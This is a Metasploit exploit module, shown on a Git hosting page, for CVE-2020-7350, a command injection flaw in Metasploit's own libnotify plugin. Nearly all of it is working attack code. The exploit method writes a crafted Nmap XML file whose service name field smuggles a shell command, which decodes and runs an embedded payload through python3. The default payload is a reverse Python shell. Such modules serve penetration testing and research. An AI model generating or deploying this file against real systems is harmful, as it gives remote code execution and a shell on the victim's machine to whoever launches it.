adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/modules/exploits/unix/fileformat/metasploit_libnotify_cmd_injection.rb
T

78 lines
2.6 KiB
Ruby
Raw Blame History

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
'Description' => %q{
This module exploits a shell command injection vulnerability in the
libnotify plugin. This vulnerability affects Metasploit versions
5.0.79 and earlier.
},
'DisclosureDate' => '2020-03-04',
'License' => GPL_LICENSE,
'Author' => [
'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
],
'References' => [
[ 'CVE', '2020-7350' ],
[ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'DisableNops' => true
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK ],
'Reliability' => [ UNRELIABLE_SESSION ]
}
)
)
register_options(
[
OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
]
)
end
def exploit
xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar 6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar 6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar 6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)
print_status "Writing xml file: #{datastore['FILENAME']}"
file_create xml
end
end
Reference in New Issue View Git Blame Copy Permalink